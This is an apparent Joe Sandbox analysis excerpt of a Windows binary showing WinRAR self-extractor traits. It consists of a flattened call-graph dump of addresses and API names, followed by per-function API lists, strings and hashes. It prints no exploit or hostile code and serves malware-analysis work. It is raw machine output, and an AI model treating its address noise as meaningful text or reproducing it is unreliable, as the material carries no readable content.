4296c9 23904->23906 23905->23906 23907 42971f 23906->23907 23908 42bb03 GetCurrentDirectoryW 23906->23908 23907->23852 23909 429704 23908->23909 23909->23907 23910 429708 CreateFileW 23909->23910 23910->23907 23912 4295cf 23911->23912 23913 4295be 
23911->23913 23912->23809 23913->23912 23914 4295d1 23913->23914 23915 4295ca 23913->23915 24047 429620 23914->24047 24042 42974e 23915->24042 23918->23829 23919->23843 23920->23859 23922 43c749 __EH_prolog 23921->23922 23923 43bdcf 23922->23923 23924 43b314 ExpandEnvironmentStringsW 23922->23924 23923->23870 23935 43c780 _wcslen _wcsrchr 23924->23935 23926 43b314 ExpandEnvironmentStringsW 23926->23935 23927 43ca67 SetWindowTextW 23927->23935 23930 443e3e 22 API calls 23930->23935 23932 43c855 SetFileAttributesW 23933 43c90f GetFileAttributesW 23932->23933 23945 43c86f _abort _wcslen 23932->23945 23933->23935 23937 43c921 DeleteFileW 23933->23937 23935->23923 23935->23926 23935->23927 23935->23930 23935->23932 23938 43cc31 GetDlgItem SetWindowTextW SendMessageW 23935->23938 23941 43cc71 SendMessageW 23935->23941 24062 431fbb CompareStringW 23935->24062 24063 43a64d GetCurrentDirectoryW 23935->24063 24065 42a5d1 6 API calls 23935->24065 24066 42a55a FindClose 23935->24066 24067 43b48e 76 API calls 2 library calls 23935->24067 23937->23935 23939 43c932 23937->23939 23938->23935 23940 424092 _swprintf 51 API calls 23939->23940 23942 43c952 GetFileAttributesW 23940->23942 23941->23935 23942->23939 23943 43c967 MoveFileW 23942->23943 23943->23935 23944 43c97f MoveFileExW 23943->23944 23944->23935 23945->23933 23945->23935 24064 42b991 51 API calls 3 library calls 23945->24064 23947 43da5c __EH_prolog 23946->23947 24068 430659 23947->24068 23949 43da8d 24072 425b3d 23949->24072 23951 43daab 24076 427b0d 23951->24076 23955 43dafe 24092 427b9e 23955->24092 23957 43bdee 23957->23879 23959 43d6a8 23958->23959 24580 43a5c6 23959->24580 23962 43bf15 23962->23731 23962->23732 23963 43d6b5 GetWindow 23963->23962 23968 43d6d5 23963->23968 23964 43d6e2 GetClassNameW 24585 431fbb CompareStringW 23964->24585 23966 43d706 GetWindowLongW 23967 43d76a GetWindow 23966->23967 23969 43d716 SendMessageW 23966->23969 23967->23962 23967->23968 23968->23962 23968->23964 23968->23966 
23968->23967 23969->23967 23970 43d72c GetObjectW 23969->23970 24586 43a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23970->24586 23972 43d743 24587 43a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23972->24587 24588 43a80c 8 API calls 23972->24588 23975 43d754 SendMessageW DeleteObject 23975->23967 23976->23747 23978 43abf1 23977->23978 23979 43abcc 23977->23979 23981 43abf6 SHAutoComplete 23978->23981 23982 43abff 23978->23982 24591 431fbb CompareStringW 23979->24591 23981->23982 23985 43b093 23982->23985 23983 43abdf 23983->23978 23984 43abe3 FindWindowExW 23983->23984 23984->23978 23986 43b09d __EH_prolog 23985->23986 23987 4213dc 84 API calls 23986->23987 23988 43b0bf 23987->23988 24592 421fdc 23988->24592 23991 43b0eb 23994 4219af 128 API calls 23991->23994 23992 43b0d9 23993 421692 86 API calls 23992->23993 23995 43b0e4 23993->23995 23997 43b10d __InternalCxxFrameHandler ___std_exception_copy 23994->23997 23995->23773 23995->23777 23996 421692 86 API calls 23996->23995 23997->23996 23998->23821 24000 43b568 5 API calls 23999->24000 24001 43d4e0 GetDlgItem 24000->24001 24002 43d502 24001->24002 24003 43d536 SendMessageW SendMessageW 24001->24003 24006 43d50d ShowWindow SendMessageW SendMessageW 24002->24006 24004 43d572 24003->24004 24005 43d591 SendMessageW SendMessageW SendMessageW 24003->24005 24004->24005 24007 43d5e7 SendMessageW 24005->24007 24008 43d5c4 SendMessageW 24005->24008 24006->24003 24007->23776 24008->24007 24009->23839 24010->23861 24011->23867 24012->23871 24013->23876 24014->23744 24015->23811 24016->23834 24017->23806 24018->23796 24019->23892 24020->23889 24022 42a2bf 24021->24022 24023 42a2e3 24022->24023 24024 42a2d6 CreateDirectoryW 24022->24024 24025 42a231 3 API calls 24023->24025 24024->24023 24029 42a316 24024->24029 24026 42a2e9 24025->24026 24027 42a329 GetLastError 24026->24027 24030 42bb03 GetCurrentDirectoryW 24026->24030 24028 42a325 24027->24028 24028->23897 24029->24028 24034 42a4ed 24029->24034 24032 42a2ff 
24030->24032 24032->24027 24033 42a303 CreateDirectoryW 24032->24033 24033->24027 24033->24029 24035 43ec50 24034->24035 24036 42a4fa SetFileAttributesW 24035->24036 24037 42a510 24036->24037 24038 42a53d 24036->24038 24039 42bb03 GetCurrentDirectoryW 24037->24039 24038->24028 24040 42a524 24039->24040 24040->24038 24041 42a528 SetFileAttributesW 24040->24041 24041->24038 24043 429781 24042->24043 24044 429757 24042->24044 24043->23912 24044->24043 24053 42a1e0 24044->24053 24048 42964a 24047->24048 24050 42962c 24047->24050 24049 429669 24048->24049 24061 426bd5 76 API calls 24048->24061 24049->23912 24050->24048 24051 429638 CloseHandle 24050->24051 24051->24048 24054 43ec50 24053->24054 24055 42a1ed DeleteFileW 24054->24055 24056 42a200 24055->24056 24057 42977f 24055->24057 24058 42bb03 GetCurrentDirectoryW 24056->24058 24057->23912 24059 42a214 24058->24059 24059->24057 24060 42a218 DeleteFileW 24059->24060 24060->24057 24061->24049 24062->23935 24063->23935 24064->23945 24065->23935 24066->23935 24067->23935 24069 430666 _wcslen 24068->24069 24096 4217e9 24069->24096 24071 43067e 24071->23949 24073 430659 _wcslen 24072->24073 24074 4217e9 78 API calls 24073->24074 24075 43067e 24074->24075 24075->23951 24077 427b17 __EH_prolog 24076->24077 24113 42ce40 24077->24113 24079 427b32 24119 43eb38 24079->24119 24081 427b5c 24128 434a76 24081->24128 24084 427c7d 24085 427c87 24084->24085 24087 427cf1 24085->24087 24160 42a56d 24085->24160 24089 427d50 24087->24089 24138 428284 24087->24138 24088 427d92 24088->23955 24089->24088 24166 42138b 74 API calls 24089->24166 24093 427bac 24092->24093 24095 427bb3 24092->24095 24094 432297 86 API calls 24093->24094 24094->24095 24097 4217ff 24096->24097 24108 42185a __InternalCxxFrameHandler 24096->24108 24098 421828 24097->24098 24109 426c36 76 API calls __vswprintf_c_l 24097->24109 24100 421887 24098->24100 24105 421847 ___std_exception_copy 24098->24105 24102 443e3e 22 API calls 24100->24102 24101 42181e 24110 426ca7 75 API 
calls 24101->24110 24104 42188e 24102->24104 24104->24108 24112 426ca7 75 API calls 24104->24112 24105->24108 24111 426ca7 75 API calls 24105->24111 24108->24071 24109->24101 24110->24098 24111->24108 24112->24108 24114 42ce4a __EH_prolog 24113->24114 24115 43eb38 8 API calls 24114->24115 24116 42ce8d 24115->24116 24117 43eb38 8 API calls 24116->24117 24118 42ceb1 24117->24118 24118->24079 24120 43eb3d ___std_exception_copy 24119->24120 24121 43eb57 24120->24121 24124 43eb59 24120->24124 24134 447a5e 7 API calls 2 library calls 24120->24134 24121->24081 24123 43f5c9 24136 44238d RaiseException 24123->24136 24124->24123 24135 44238d RaiseException 24124->24135 24127 43f5e6 24129 434a80 __EH_prolog 24128->24129 24130 43eb38 8 API calls 24129->24130 24131 434a9c 24130->24131 24132 427b8b 24131->24132 24137 430e46 80 API calls 24131->24137 24132->24084 24134->24120 24135->24123 24136->24127 24137->24132 24139 42828e __EH_prolog 24138->24139 24167 4213dc 24139->24167 24141 4282aa 24142 4282bb 24141->24142 24310 429f42 24141->24310 24145 4282f2 24142->24145 24175 421a04 24142->24175 24306 421692 24145->24306 24148 428389 24194 428430 24148->24194 24151 4283e8 24202 421f6d 24151->24202 24153 4282ee 24153->24145 24153->24148 24158 42a56d 7 API calls 24153->24158 24314 42c0c5 CompareStringW _wcslen 24153->24314 24156 4283f3 24156->24145 24206 423b2d 24156->24206 24218 42848e 24156->24218 24158->24153 24161 42a582 24160->24161 24165 42a5b0 24161->24165 24569 42a69b 24161->24569 24163 42a592 24164 42a597 FindClose 24163->24164 24163->24165 24164->24165 24165->24085 24166->24088 24168 4213e1 __EH_prolog 24167->24168 24169 42ce40 8 API calls 24168->24169 24170 421419 24169->24170 24171 43eb38 8 API calls 24170->24171 24174 421474 _abort 24170->24174 24172 421461 24171->24172 24173 42b505 84 API calls 24172->24173 24172->24174 24173->24174 24174->24141 24176 421a0e __EH_prolog 24175->24176 24185 421a61 24176->24185 24189 421b9b 24176->24189 24315 4213ba 24176->24315 24178 421bc7 
24327 42138b 74 API calls 24178->24327 24181 423b2d 101 API calls 24186 421c12 24181->24186 24182 421bd4 24182->24181 24182->24189 24183 421c5a 24187 421c8d 24183->24187 24183->24189 24328 42138b 74 API calls 24183->24328 24185->24178 24185->24182 24185->24189 24186->24183 24188 423b2d 101 API calls 24186->24188 24187->24189 24193 429e80 79 API calls 24187->24193 24188->24186 24189->24153 24190 421cde 24190->24189 24191 423b2d 101 API calls 24190->24191 24191->24190 24193->24190 24348 42cf3d 24194->24348 24196 428440 24352 4313d2 GetSystemTime SystemTimeToFileTime 24196->24352 24198 4283a3 24198->24151 24199 431b66 24198->24199 24357 43de6b 24199->24357 24203 421f72 __EH_prolog 24202->24203 24205 421fa6 24203->24205 24365 4219af 24203->24365 24205->24156 24207 423b39 24206->24207 24208 423b3d 24206->24208 24207->24156 24217 429e80 79 API calls 24208->24217 24209 423b4f 24210 423b6a 24209->24210 24211 423b78 24209->24211 24212 423baa 24210->24212 24495 4232f7 89 API calls 2 library calls 24210->24495 24496 42286b 101 API calls 3 library calls 24211->24496 24212->24156 24215 423b76 24215->24212 24497 4220d7 74 API calls 24215->24497 24217->24209 24219 428498 __EH_prolog 24218->24219 24222 4284d5 24219->24222 24229 428513 24219->24229 24522 438c8d 103 API calls 24219->24522 24221 4284f5 24223 4284fa 24221->24223 24224 42851c 24221->24224 24222->24221 24227 42857a 24222->24227 24222->24229 24223->24229 24523 427a0d 152 API calls 24223->24523 24224->24229 24524 438c8d 103 API calls 24224->24524 24227->24229 24498 425d1a 24227->24498 24229->24156 24230 428605 24230->24229 24504 428167 24230->24504 24233 428797 24234 42a56d 7 API calls 24233->24234 24235 428802 24233->24235 24234->24235 24510 427c0d 24235->24510 24237 42d051 82 API calls 24243 42885d 24237->24243 24238 42898b 24527 422021 74 API calls 24238->24527 24239 428a5f 24244 428ab6 24239->24244 24257 428a6a 24239->24257 24240 428992 24240->24239 24246 4289e1 24240->24246 24243->24229 24243->24237 24243->24238 
24243->24240 24525 428117 84 API calls 24243->24525 24526 422021 74 API calls 24243->24526 24249 428a4c 24244->24249 24530 427fc0 97 API calls 24244->24530 24245 428ab4 24250 42959a 80 API calls 24245->24250 24247 428b14 24246->24247 24246->24249 24251 42a231 3 API calls 24246->24251 24265 428b82 24247->24265 24295 429105 24247->24295 24531 4298bc 24247->24531 24248 42959a 80 API calls 24248->24229 24249->24245 24249->24247 24250->24229 24253 428a19 24251->24253 24253->24249 24528 4292a3 97 API calls 24253->24528 24254 42ab1a 8 API calls 24258 428bd1 24254->24258 24257->24245 24529 427db2 101 API calls 24257->24529 24260 42ab1a 8 API calls 24258->24260 24277 428be7 24260->24277 24263 428b70 24535 426e98 77 API calls 24263->24535 24265->24254 24266 428cbc 24267 428e40 24266->24267 24268 428d18 24266->24268 24270 428e52 24267->24270 24271 428e66 24267->24271 24291 428d49 24267->24291 24269 428d8a 24268->24269 24272 428d28 24268->24272 24278 428167 19 API calls 24269->24278 24273 429215 123 API calls 24270->24273 24274 433377 75 API calls 24271->24274 24275 428d6e 24272->24275 24279 428d37 24272->24279 24273->24291 24276 428e7f 24274->24276 24275->24291 24538 4277b8 111 API calls 24275->24538 24541 433020 123 API calls 24276->24541 24277->24266 24284 42981a 79 API calls 24277->24284 24286 428c93 24277->24286 24285 428dbd 24278->24285 24537 422021 74 API calls 24279->24537 24284->24286 24287 428de6 24285->24287 24288 428df5 24285->24288 24285->24291 24286->24266 24536 429a3c 82 API calls 24286->24536 24539 427542 85 API calls 24287->24539 24540 429155 93 API calls __EH_prolog 24288->24540 24294 428f85 24291->24294 24542 422021 74 API calls 24291->24542 24293 429090 24293->24295 24297 42a4ed 3 API calls 24293->24297 24294->24293 24294->24295 24296 42903e 24294->24296 24516 429f09 SetEndOfFile 24294->24516 24295->24248 24517 429da2 24296->24517 24299 4290eb 24297->24299 24299->24295 24543 422021 74 API calls 24299->24543 24301 429085 24302 429620 77 API calls 
24301->24302 24302->24293 24304 4290fb 24544 426dcb 76 API calls _wcschr 24304->24544 24307 4216a4 24306->24307 24560 42cee1 24307->24560 24311 429f59 24310->24311 24312 429f63 24311->24312 24568 426d0c 78 API calls 24311->24568 24312->24142 24314->24153 24329 421732 24315->24329 24317 4213d6 24318 429e80 24317->24318 24319 429e92 24318->24319 24320 429ea5 24318->24320 24321 429eb0 24319->24321 24346 426d5b 77 API calls 24319->24346 24320->24321 24323 429eb8 SetFilePointer 24320->24323 24321->24185 24323->24321 24324 429ed4 GetLastError 24323->24324 24324->24321 24325 429ede 24324->24325 24325->24321 24347 426d5b 77 API calls 24325->24347 24327->24189 24328->24187 24330 421748 24329->24330 24341 4217a0 __InternalCxxFrameHandler 24329->24341 24331 421771 24330->24331 24342 426c36 76 API calls __vswprintf_c_l 24330->24342 24332 4217c7 24331->24332 24338 42178d ___std_exception_copy 24331->24338 24335 443e3e 22 API calls 24332->24335 24334 421767 24343 426ca7 75 API calls 24334->24343 24337 4217ce 24335->24337 24337->24341 24345 426ca7 75 API calls 24337->24345 24338->24341 24344 426ca7 75 API calls 24338->24344 24341->24317 24342->24334 24343->24331 24344->24341 24345->24341 24346->24320 24347->24321 24349 42cf54 24348->24349 24350 42cf4d 24348->24350 24349->24196 24353 42981a 24350->24353 24352->24198 24354 429833 24353->24354 24356 429e80 79 API calls 24354->24356 24355 429865 24355->24349 24356->24355 24358 43de78 24357->24358 24359 42e617 53 API calls 24358->24359 24360 43de9b 24359->24360 24361 424092 _swprintf 51 API calls 24360->24361 24362 43dead 24361->24362 24363 43d4d4 16 API calls 24362->24363 24364 431b7c 24363->24364 24364->24151 24366 4219bf 24365->24366 24368 4219bb 24365->24368 24369 4218f6 24366->24369 24368->24205 24370 421908 24369->24370 24371 421945 24369->24371 24372 423b2d 101 API calls 24370->24372 24377 423fa3 24371->24377 24375 421928 24372->24375 24375->24368 24381 423fac 24377->24381 24378 423b2d 101 API calls 24378->24381 24379 421966 
24379->24375 24382 421e50 24379->24382 24381->24378 24381->24379 24394 430e08 24381->24394 24383 421e5a __EH_prolog 24382->24383 24402 423bba 24383->24402 24385 421e84 24386 421732 78 API calls 24385->24386 24388 421f0b 24385->24388 24387 421e9b 24386->24387 24430 4218a9 78 API calls 24387->24430 24388->24375 24390 421eb3 24392 421ebf _wcslen 24390->24392 24431 431b84 MultiByteToWideChar 24390->24431 24432 4218a9 78 API calls 24392->24432 24395 430e0f 24394->24395 24396 430e2a 24395->24396 24400 426c31 RaiseException CallUnexpected 24395->24400 24398 430e3b SetThreadExecutionState 24396->24398 24401 426c31 RaiseException CallUnexpected 24396->24401 24398->24381 24400->24396 24401->24398 24403 423bc4 __EH_prolog 24402->24403 24404 423bf6 24403->24404 24405 423bda 24403->24405 24407 423e51 24404->24407 24410 423c22 24404->24410 24458 42138b 74 API calls 24405->24458 24475 42138b 74 API calls 24407->24475 24409 423be5 24409->24385 24410->24409 24433 433377 24410->24433 24412 423ca3 24413 423d2e 24412->24413 24429 423c9a 24412->24429 24461 42d051 24412->24461 24443 42ab1a 24413->24443 24414 423c9f 24414->24412 24460 4220bd 78 API calls 24414->24460 24416 423c71 24416->24412 24416->24414 24417 423c8f 24416->24417 24459 42138b 74 API calls 24417->24459 24419 423d41 24423 423dd7 24419->24423 24424 423dc7 24419->24424 24467 433020 123 API calls 24423->24467 24447 429215 24424->24447 24427 423dd5 24427->24429 24468 422021 74 API calls 24427->24468 24469 432297 24429->24469 24430->24390 24431->24392 24432->24388 24434 43338c 24433->24434 24436 433396 ___std_exception_copy 24433->24436 24476 426ca7 75 API calls 24434->24476 24437 4334c6 24436->24437 24438 43341c 24436->24438 24442 433440 _abort 24436->24442 24478 44238d RaiseException 24437->24478 24477 4332aa 75 API calls 3 library calls 24438->24477 24441 4334f2 24442->24416 24444 42ab28 24443->24444 24446 42ab32 24443->24446 24445 43eb38 8 API calls 24444->24445 24445->24446 24446->24419 24448 42921f __EH_prolog 
24447->24448 24479 427c64 24448->24479 24451 4213ba 78 API calls 24452 429231 24451->24452 24482 42d114 24452->24482 24454 42928a 24454->24427 24456 42d114 118 API calls 24457 429243 24456->24457 24457->24454 24457->24456 24491 42d300 97 API calls __InternalCxxFrameHandler 24457->24491 24458->24409 24459->24429 24460->24412 24462 42d072 24461->24462 24463 42d084 24461->24463 24492 42603a 82 API calls 24462->24492 24493 42603a 82 API calls 24463->24493 24466 42d07c 24466->24413 24467->24427 24468->24429 24470 4322a1 24469->24470 24471 4322ba 24470->24471 24474 4322ce 24470->24474 24494 430eed 86 API calls 24471->24494 24473 4322c1 24473->24474 24475->24409 24476->24436 24477->24442 24478->24441 24480 42b146 GetVersionExW 24479->24480 24481 427c69 24480->24481 24481->24451 24488 42d12a __InternalCxxFrameHandler 24482->24488 24483 42d29a 24484 42d2ce 24483->24484 24485 42d0cb 6 API calls 24483->24485 24486 430e08 SetThreadExecutionState RaiseException 24484->24486 24485->24484 24489 42d291 24486->24489 24487 438c8d 103 API calls 24487->24488 24488->24483 24488->24487 24488->24489 24490 42ac05 91 API calls 24488->24490 24489->24457 24490->24488 24491->24457 24492->24466 24493->24466 24494->24473 24495->24215 24496->24215 24497->24212 24499 425d2a 24498->24499 24545 425c4b 24499->24545 24502 425d5d 24503 425d95 24502->24503 24550 42b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24502->24550 24503->24230 24505 428186 24504->24505 24506 428232 24505->24506 24557 42be5e 19 API calls __InternalCxxFrameHandler 24505->24557 24556 431fac CharUpperW 24506->24556 24509 42823b 24509->24233 24511 427c22 24510->24511 24512 427c5a 24511->24512 24558 426e7a 74 API calls 24511->24558 24512->24243 24514 427c52 24559 42138b 74 API calls 24514->24559 24516->24296 24518 429db3 24517->24518 24521 429dc2 24517->24521 24519 429db9 FlushFileBuffers 24518->24519 24518->24521 24519->24521 24520 429e3f SetFileTime 24520->24301 24521->24520 24522->24222 24523->24229 24524->24229 
24525->24243 24526->24243 24527->24240 24528->24249 24529->24245 24530->24249 24532 428b5a 24531->24532 24533 4298c5 GetFileType 24531->24533 24532->24265 24534 422021 74 API calls 24532->24534 24533->24532 24534->24263 24535->24265 24536->24266 24537->24291 24538->24291 24539->24291 24540->24291 24541->24291 24542->24294 24543->24304 24544->24295 24551 425b48 24545->24551 24547 425c6c 24547->24502 24549 425b48 2 API calls 24549->24547 24550->24502 24554 425b52 24551->24554 24552 425c3a 24552->24547 24552->24549 24554->24552 24555 42b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24554->24555 24555->24554 24556->24509 24557->24506 24558->24514 24559->24512 24561 42cef2 24560->24561 24566 42a99e 86 API calls 24561->24566 24563 42cf24 24567 42a99e 86 API calls 24563->24567 24565 42cf2f 24566->24563 24567->24565 24568->24312 24570 42a6a8 24569->24570 24571 42a6c1 FindFirstFileW 24570->24571 24572 42a727 FindNextFileW 24570->24572 24573 42a709 24571->24573 24574 42a6d0 24571->24574 24572->24573 24575 42a732 GetLastError 24572->24575 24573->24163 24576 42bb03 GetCurrentDirectoryW 24574->24576 24575->24573 24577 42a6e0 24576->24577 24578 42a6e4 FindFirstFileW 24577->24578 24579 42a6fe GetLastError 24577->24579 24578->24573 24578->24579 24579->24573 24589 43a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24580->24589 24582 43a5cd 24584 43a5d9 24582->24584 24590 43a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24582->24590 24584->23962 24584->23963 24585->23968 24586->23972 24587->23972 24588->23975 24589->24582 24590->24584 24591->23983 24593 429f42 78 API calls 24592->24593 24594 421fe8 24593->24594 24595 421a04 101 API calls 24594->24595 24598 422005 24594->24598 24596 421ff5 24595->24596 24596->24598 24599 42138b 74 API calls 24596->24599 24598->23991 24598->23992 24599->24598 24600 4213e1 84 API calls 2 library calls 25300 4394e0 GetClientRect 25329 4321e0 26 API calls std::bad_exception::bad_exception 25352 43f2e0 46 API calls __RTC_Initialize 24601 
43eae7 24602 43eaf1 24601->24602 24603 43e85d ___delayLoadHelper2@8 14 API calls 24602->24603 24604 43eafe 24603->24604 25301 43f4e7 29 API calls _abort 25353 44bee0 GetCommandLineA GetCommandLineW 25330 42f1e8 FreeLibrary 25331 4295f0 80 API calls 25332 43fd4f 9 API calls 2 library calls 25354 425ef0 82 API calls 24613 4498f0 24621 44adaf 24613->24621 24616 449904 24618 44990c 24619 449919 24618->24619 24629 449920 11 API calls 24618->24629 24630 44ac98 24621->24630 24624 44adee TlsAlloc 24625 44addf 24624->24625 24626 43fbbc CatchGuardHandler 5 API calls 24625->24626 24627 4498fa 24626->24627 24627->24616 24628 449869 20 API calls 2 library calls 24627->24628 24628->24618 24629->24616 24631 44acc4 24630->24631 24632 44acc8 24630->24632 24631->24632 24635 44ace8 24631->24635 24637 44ad34 24631->24637 24632->24624 24632->24625 24634 44acf4 GetProcAddress 24636 44ad04 _unexpected 24634->24636 24635->24632 24635->24634 24636->24632 24638 44ad55 LoadLibraryExW 24637->24638 24643 44ad4a 24637->24643 24639 44ad72 GetLastError 24638->24639 24640 44ad8a 24638->24640 24639->24640 24641 44ad7d LoadLibraryExW 24639->24641 24642 44ada1 FreeLibrary 24640->24642 24640->24643 24641->24640 24642->24643 24643->24631 24644 44abf0 24646 44abfb 24644->24646 24647 44ac24 24646->24647 24648 44ac20 24646->24648 24650 44af0a 24646->24650 24657 44ac50 DeleteCriticalSection 24647->24657 24651 44ac98 _unexpected 5 API calls 24650->24651 24652 44af31 24651->24652 24653 44af4f InitializeCriticalSectionAndSpinCount 24652->24653 24656 44af3a 24652->24656 24653->24656 24654 43fbbc CatchGuardHandler 5 API calls 24655 44af66 24654->24655 24655->24646 24656->24654 24657->24648 25302 4488f0 7 API calls ___scrt_uninitialize_crt 25304 442cfb 38 API calls 4 library calls 25334 439580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25355 43c793 102 API calls 5 library calls 25306 43c793 97 API calls 4 library calls 25336 43b18d 78 API calls 25308 44b49d 6 API calls 

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00430863: GetModuleHandleW.KERNEL32(kernel32), ref: 0043087C
                                                                • Part of subcall function 00430863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0043088E
                                                                • Part of subcall function 00430863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004308BF
                                                                • Part of subcall function 0043A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0043A655
                                                                • Part of subcall function 0043AC16: OleInitialize.OLE32(00000000), ref: 0043AC2F
                                                                • Part of subcall function 0043AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0043AC66
                                                                • Part of subcall function 0043AC16: SHGetMalloc.SHELL32(00468438), ref: 0043AC70
                                                              • GetCommandLineW.KERNEL32 ref: 0043DF5C
                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0043DF83
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0043DF94
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0043DFCE
                                                                • Part of subcall function 0043DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0043DBF4
                                                                • Part of subcall function 0043DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0043DC30
                                                              • CloseHandle.KERNEL32(00000000), ref: 0043DFD7
                                                              • GetModuleFileNameW.KERNEL32(00000000,0047EC90,00000800), ref: 0043DFF2
                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,0047EC90), ref: 0043DFFE
                                                              • GetLocalTime.KERNEL32(?), ref: 0043E009
                                                              • _swprintf.LIBCMT ref: 0043E048
                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0043E05A
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0043E061
                                                              • LoadIconW.USER32(00000000,00000064), ref: 0043E078
                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0043E0C9
                                                              • Sleep.KERNEL32(?), ref: 0043E0F7
                                                              • DeleteObject.GDI32 ref: 0043E130
                                                              • DeleteObject.GDI32(?), ref: 0043E140
                                                              • CloseHandle.KERNEL32 ref: 0043E183
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
• Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzG
                                                              • API String ID: 3049964643-3170321481
                                                              • Opcode ID: e51c60f3f324e2bad77c1b0a8f7156932ac95cd18179f8aa1da66c1270a1031a
                                                              • Instruction ID: f4a5b70370df261df859dc905778fb052f9bb8e77de9587d8240c127c44476f0
                                                              • Opcode Fuzzy Hash: e51c60f3f324e2bad77c1b0a8f7156932ac95cd18179f8aa1da66c1270a1031a
                                                              • Instruction Fuzzy Hash: A561E531904305AFD720AF72AC49B2B77ACAB09749F04143FF945922D2EBBC9944C76E

                                                              Control-flow Graph

                                                              APIs
                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0043B73D,00000066), ref: 0043A6D5
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A6EC
                                                              • LoadResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A703
                                                              • LockResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A712
                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0043B73D,00000066), ref: 0043A72D
                                                              • GlobalLock.KERNEL32(00000000), ref: 0043A73E
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0043A762
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0043A7C6
                                                                • Part of subcall function 0043A626: GdipAlloc.GDIPLUS(00000010), ref: 0043A62C
                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0043A7A7
                                                              • GlobalFree.KERNEL32(00000000), ref: 0043A7CD
                                                              Strings
                                                              Similarity
                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                              • String ID: FjunC$PNG
                                                              • API String ID: 211097158-2777305062
                                                              • Opcode ID: 2cac095efd2ff056d19f5076b4abc9127363cc0ab22775a51342d47a0f7358cc
                                                              • Instruction ID: 52aceddbd7808be46800af9523d255ddfb276d4ac68618c6254f480e2f290831
                                                              • Opcode Fuzzy Hash: 2cac095efd2ff056d19f5076b4abc9127363cc0ab22775a51342d47a0f7358cc
                                                              • Instruction Fuzzy Hash: 5231C475600702AFD7119F31DC88D1BBBB8EF88792F04052AF84582761EB35DC54DA6A

                                                              Control-flow Graph

                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6C4
                                                                • Part of subcall function 0042BB03: _wcslen.LIBCMT ref: 0042BB27
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6F2
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6FE
                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A728
                                                              • GetLastError.KERNEL32(?,?,?,?,0042A592,000000FF,?,?), ref: 0042A734
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                              • String ID:
                                                              • API String ID: 42610566-0
                                                              • Opcode ID: ecf6c0bc380f9d2f274fb17c5f3c7d1d5f81b2cce588752534a0cc77b997648e
                                                              • Instruction ID: 65129bf79127adfa3a74fa91f9ea585ef033bf6f0900cf2daa3253ae3a15000a
                                                              • Opcode Fuzzy Hash: ecf6c0bc380f9d2f274fb17c5f3c7d1d5f81b2cce588752534a0cc77b997648e
                                                              • Instruction Fuzzy Hash: 5441B631600225ABC715DF64DC88ADAF7B8FB48351F004196E95DE3240D738AEA0CF98
                                                              APIs
